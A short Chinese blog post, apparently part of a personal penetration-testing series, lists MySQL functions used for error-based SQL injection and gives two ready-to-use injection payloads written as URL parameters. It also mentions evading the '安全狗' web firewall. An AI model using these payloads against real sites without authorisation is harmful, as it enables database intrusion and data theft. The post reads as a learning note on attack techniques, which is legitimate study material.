• 别人的渗透测试(三)--SQL显错注入


    续上一章。

    安全狗拦下7成的人,过狗是门学问,偷笑.jpg。很感谢和https://home.cnblogs.com/u/xishaonian/ 博主能一起研究过狗。

    说多了,言归正传SQL注入大显错。只适用MYSQL,其它数据库没学呢...

    1、count,rand,floor

    2、updatexml()【最大长度限制32位】

    3、extractvalue()【最大长度限制32位】

    4、geometrycollection()

    5、multipoint()

    6、polygon()

    7、multipolygon()

    8、linestring()

    9、multilinestring()

    10、exp()

    11、NAME_CONST(适用于低版本)

    ?id=3&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
    

    12、Error based Double Query Injection

    id=99+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1
    

    13、以后再添加

    2和3只能返回32位长度,如果想再多返回字符串,请使用分页或者截取字符串。/偷笑

    前十个博客中如下:

    http://www.cnblogs.com/MiWhite/p/6384711.html
    http://www.cnblogs.com/MiWhite/p/6254336.html
    http://www.cnblogs.com/MiWhite/p/6241265.html
    

    SQL注入的方式好多,待老夫慢慢总结,莫着急。

    各位拜拜~下章见。

  • 相关阅读:
    什么是 Spring Boot?
    Spring Cloud Gateway?
    什么是 Netflix Feign?它的优点是什么?
    SpringBoot和SpringCloud的区别?
    什么是Hystrix?
    什么是Spring Cloud Bus?
    什么是Ribbon?
    eureka自我保护机制是什么?
    spring cloud 和dubbo区别?
    如何在 Spring Boot 中禁用 Actuator 端点安全性?
  • 原文地址:https://www.cnblogs.com/MiWhite/p/6931075.html
Copyright © 2020-2023  润新知